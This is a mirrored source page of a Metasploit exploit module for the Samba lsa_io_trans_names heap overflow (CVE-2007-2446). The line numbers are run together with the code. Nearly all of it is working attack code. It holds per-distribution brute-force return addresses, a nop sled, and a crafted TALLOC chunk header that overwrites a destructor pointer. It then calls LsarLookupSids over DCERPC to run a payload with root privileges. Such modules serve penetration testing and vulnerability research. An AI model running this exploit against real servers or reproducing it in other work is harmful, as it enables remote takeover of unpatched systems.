CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/samba/lsa_transnames_heap.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::DCERPC9include Msf::Exploit::Remote::SMB::Client10include Msf::Exploit::Brute1112def initialize(info = {})13super(update_info(info,14'Name' => 'Samba lsa_io_trans_names Heap Overflow',15'Description' => %q{16This module triggers a heap overflow in the LSA RPC service17of the Samba daemon. This module uses the TALLOC chunk overwrite18method (credit Ramon and Adriano), which only works with Samba19versions 3.0.21-3.0.24. Additionally, this module will not work20when the Samba "log level" parameter is higher than "2".21},22'Author' =>23[24'Ramon de C Valle',25'Adriano Lima <adriano[at]risesecurity.org>',26'hdm'27],28'License' => MSF_LICENSE,29'References' =>30[31['CVE', '2007-2446'],32['OSVDB', '34699'],33],34'Privileged' => true,35'Payload' =>36{37'Space' => 1024, # no limit really38},39'Platform' => 'linux',40'DefaultOptions' =>41{42'PrependSetresuid' => true,43'PrependSetreuid' => true,44'PrependSetuid' => true,45},46'Targets' =>47[48['Linux vsyscall',49{50'Platform' => 'linux',51'Arch' => [ ARCH_X86 ],52'Nops' => 1024,53'Bruteforce' =>54{55'Start' => { 'Ret' => 0xffffe410 },56'Stop' => { 'Ret' => 0xffffe413 },57'Step' => 1,58}59}60],616263##64# 08356000-0843d000 rwxp 08356000 00:00 0 (Debian) # KF65# 80300000-8042f000 rw-p 80300000 00:00 0 (Gentoo) # hdm66# b800f000-b80c9000 rwxp b800f000 00:00 0 (RHEL/CentOS) # Adriano/Ramon67# 80365000-80424000 rwxp 80365000 00:00 0 (SUSE) # Adriano/Ramon68# 8033c000-80412000 rwxp 00000000 00:00 0 (Slackware) # Adriano/Ramon69# 08342000-08436000 rwxp 00000000 00:00 0 (Ubuntu) # hdm70# 08270000-0837f000 rwxp 00000000 00:00 0 (SNAP) # Andrew71#72##7374['Linux Heap Brute Force (Debian/Ubuntu)',75{76'Platform' => 'linux',77'Arch' => [ ARCH_X86 ],78'Nops' => 64*1024,79'Bruteforce' =>80{81'Start' => { 'Ret' => 0x08352000 },82'Stop' => { 'Ret' => 0x0843d000 },83'Step' => 60*1024,8485}86}87],8889['Linux Heap Brute Force (Gentoo)',90{91'Platform' => 'linux',92'Arch' => [ ARCH_X86 ],93'Nops' => 64*1024,94'Bruteforce' =>95{96'Start' => { 'Ret' => 0x80310000 },97'Stop' => { 'Ret' => 0x8042f000 },98'Step' => 60*1024,99100}101}102],103104105106['Linux Heap Brute Force (Mandriva)',107{108'Platform' => 'linux',109'Arch' => [ ARCH_X86 ],110'Nops' => 64*1024,111'Bruteforce' =>112{113'Start' => { 'Ret' => 0x80380000 },114'Stop' => { 'Ret' => 0x8045b000 },115'Step' => 60*1024,116117}118}119],120121['Linux Heap Brute Force (RHEL/CentOS)',122{123'Platform' => 'linux',124'Arch' => [ ARCH_X86 ],125'Nops' => 64*1024,126'Bruteforce' =>127{128'Start' => { 'Ret' => 0xb800f000 },129'Stop' => { 'Ret' => 0xb80c9000 },130'Step' => 60*1024,131132}133}134],135136['Linux Heap Brute Force (SUSE)',137{138'Platform' => 'linux',139'Arch' => [ ARCH_X86 ],140'Nops' => 64*1024,141'Bruteforce' =>142{143'Start' => { 'Ret' => 0x80365000 },144'Stop' => { 'Ret' => 0x80424000 },145'Step' => 60*1024,146147}148}149],150151['Linux Heap Brute Force (Slackware)',152{153'Platform' => 'linux',154'Arch' => [ ARCH_X86 ],155'Nops' => 64*1024,156'Bruteforce' =>157{158'Start' => { 'Ret' => 0x8033c000 },159'Stop' => { 'Ret' => 0x80412000 },160'Step' => 60*1024,161162}163}164],165166['Linux Heap Brute Force (OpenWRT MIPS)',167{168'Platform' => 'linux',169'Arch' => [ ARCH_MIPSBE ],170'Nops' => 64*1024,171'Bruteforce' =>172{173'Start' => { 'Ret' => 0x55900000 },174'Stop' => { 'Ret' => 0x559c0000 },175'Step' => 60*1024,176}177}178],179180['DEBUG',181{182'Platform' => 'linux',183'Arch' => [ ARCH_X86 ],184'Nops' => 1024,185'Bruteforce' =>186{187'Start' => { 'Ret' => 0xAABBCCDD },188'Stop' => { 'Ret' => 0xAABBCCDD },189'Step' => 4,190}191}192],193],194'DisclosureDate' => '2007-05-14',195'DefaultTarget' => 0196))197198register_options(199[200OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),201])202203deregister_options('SMB::ProtocolVersion')204end205206def check207begin208connect(versions: [1])209smb_login()210disconnect()211if (smb_peer_lm() =~ /Samba/i)212return CheckCode::Detected213else214return CheckCode::Safe215end216rescue ::Exception217return CheckCode::Safe218end219end220221def brute_exploit(target_addrs)222223if(not @nops)224if (target['Nops'] > 0)225print_status("Creating nop sled....")226@nops = make_nops(target['Nops'])227else228@nops = ''229end230231# @nops = "\xcc" * (@nops.length)232end233234print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret'])235236nops = @nops237pipe = datastore['SMBPIPE'].downcase238239print_status("Connecting to the SMB service...")240connect(versions: [1])241smb_login()242243if ! @checked_peerlm244if smb_peer_lm !~ /Samba 3\.0\.2[1234]/i245fail_with(Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")246end247end248249@checked_peerlm = true250251datastore['DCERPC::fake_bind_multi'] = false252253handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])254print_status("Binding to #{handle} ...")255dcerpc_bind(handle)256print_status("Bound to #{handle} ...")257258jumper = "P" * 256259jumper[24, 5] = "\xe9" + [-5229-11-5-(nops.length/2)].pack('V')260261num_entries = 256262num_entries2 = 272263264# first talloc_chunk265# 16 bits align266# 16 bits sid_name_use267# 16 bits uni_str_len268# 16 bits uni_max_len269# 32 bits buffer270# 32 bits domain_idx271buf = (('A' * 16) * num_entries)272273# padding274buf << 'A' * 8275276# TALLOC_MAGIC277talloc_magic = "\x70\xec\x14\xe8"278279# second talloc_chunk header280buf << NDR.long(0) + NDR.long(0) # next, prev281buf << NDR.long(0) + NDR.long(0) # parent, child282buf << NDR.long(0) # refs283buf << [target_addrs['Ret']].pack('V') # destructor284buf << 'A' * 4 # name285buf << 'A' * 4 # size286buf << talloc_magic # flags287buf << jumper288289stub = lsa_open_policy(dcerpc)290291stub << NDR.long(0) # num_entries292stub << NDR.long(0) # ptr_sid_enum293stub << NDR.long(num_entries) # num_entries294stub << NDR.long(0x20004) # ptr_trans_names295stub << NDR.long(num_entries2) # num_entries2296stub << buf297stub << nops298stub << payload.encoded299300print_status("Calling the vulnerable function...")301302begin303# LsarLookupSids304dcerpc.call(0x0f, stub)305rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError306print_status('Server did not respond, this is expected')307rescue Rex::Proto::DCERPC::Exceptions::Fault308print_error('Server is most likely patched...')309rescue => e310if e.to_s =~ /STATUS_PIPE_DISCONNECTED/311print_status('Server disconnected, this is expected')312else313print_error("Error: #{e.class}: #{e}")314end315end316317handler318disconnect319end320321def lsa_open_policy(dcerpc, server="\\")322stubdata =323# Server324NDR.uwstring(server) +325# Object Attributes326NDR.long(24) + # SIZE327NDR.long(0) + # LSPTR328NDR.long(0) + # NAME329NDR.long(0) + # ATTRS330NDR.long(0) + # SEC DES331# LSA QOS PTR332NDR.long(1) + # Referent333NDR.long(12) + # Length334NDR.long(2) + # Impersonation335NDR.long(1) + # Context Tracking336NDR.long(0) + # Effective Only337# Access Mask338NDR.long(0x02000000)339340res = dcerpc.call(6, stubdata)341342dcerpc.last_response.stub_data[0,20]343end344end345346347